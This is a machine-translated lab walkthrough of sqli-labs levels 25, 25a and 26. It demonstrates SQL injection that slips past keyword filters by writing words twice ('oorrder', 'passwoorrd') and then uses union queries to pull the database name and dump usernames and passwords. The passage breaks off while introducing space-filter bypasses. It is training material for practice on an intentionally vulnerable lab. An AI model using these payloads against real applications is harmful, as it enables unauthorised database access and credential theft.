当前位置：网站首页>Network security - filtering bypass injection

Network security - filtering bypass injection

2022-07-24 13:42:00 【Beluga】

Comprehensive penetration test - Filter bypass injection

First step , Open the network topology , Start the experimental virtual machine , View the virtual machines separately IP Address ：

Kali Linux

Windows 7

The second step , Use Kali Linux Access target sqli-labs Range page , The first 25 Turn off ：

http://172.16.1.200/sqli-labs/Less-25

The third step , Right. 25 Conduct penetration test ：

1） Fundamentals of testing SQL Injection of statements ：

http://172.16.1.200/sqli-labs/Less-25/?id=1' #

2） Failed to use pound mark annotation , Try instead “--+” To test ：

http://172.16.1.200/sqli-labs/Less-25/?id=1' --+

Show user name and password ：Dumb.

3） Try to explode the number of columns in the current table ：

?id=1' order by 5 --+

By returning the result , We speculate “order” Turned into “der”, Because the background filter “or”, Replace with a null value .

4） because “or” By WAF Filter , We will “or” Change it to "oorr" Try , such WAF Filtering a “or” after , One more “or”, We call this method “ Double write ”：

?id=1' oorrder by 5 --+

success , But it shows that the 5 Column does not exist .

5） Query whether there is a fourth column ：

?id=1' oorrder by 4--+

The fourth column does not exist .

6） Query whether there is a third column

The third column exists , Prove that there are three fields in the current table .

7） First test the relative display position of the field ：

?id=1' union select 1,2,3 --+

Our joint injection did not take effect , It still shows ID by 1 The user's information .

8） take id Change to a nonexistent id, Retry injection ：

?id=-1' union select 1,2,3 --+

Inject success , The first 2 And the 3 The fields are user name and password .

9） Get the currently used database name ：

?id=-1' union select 1,2,database() --+

Get the currently used database name ：security

10） from users Read from the table respectively username（ user name ）,password（ password ） Value ：

id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users --+

What needs to be noted here is ,“password” It includes “or”, It needs to be written as “passwoorrd”.

Successfully get the user name and password .

Step four , visit sqli-labs Of the 25a checkpoint ：

http://172.16.1.200/sqli-labs/Less-25a

Step five , Right. 25a Level for injection test ：

1） First, test whether it can pass ID Read user information ：

http://172.16.1.200/sqli-labs/Less-25a/?id=1

You can read user information .

2） Try to explode the relative position of the field ：

?id=-1' union select 1,2,3#

No results are displayed .

3） see 25a The source code of the level （ be located C:\AppServ\www\sqli-labs\Less-25a\index.php）：

The first 35 That's ok ,SQL There is no single quotation mark in the statement , Prove that this is a digital injection .

4） Try to remove the single quotation mark for joint query injection ：

?id=-1 union select 1,2,3#

Inject success .

5） Get the currently used database name ：

?id=-1 union select 1,2,database() #

Get the current database name ：security.

6） from users Read from the table respectively username（ user name ）,password（ password ） Value ：

id=-1 union select 1,2,group_concat(username,0x7e,passwoorrd) from users #

Successfully get the user name and password .

Step six , visit sqli-labs Of the 26 checkpoint ：

http://172.16.1.200/sqli-labs/Less-26

Step seven , Right. 26 Level for injection test ：

1） Test first ID Whether the display is normal ：

http://172.16.1.200/sqli-labs/Less-26/?id=1

2） Look at the first 26 Level source code （ be located C:\AppServ\www\sqli-labs\Less-26\index.php）：

Through auditing the source code, we found , The first 57 Yes blacklist Methods will be common SQL All statements are filtered to be empty .

From the above filtering mechanism, we can find that “or”、“and”、“/*”、“#”、“--”“/” And other special symbols are filtered , This is for and and or I won't say more about how to bypass , Here we talk about several techniques ：

Wrap around the space ：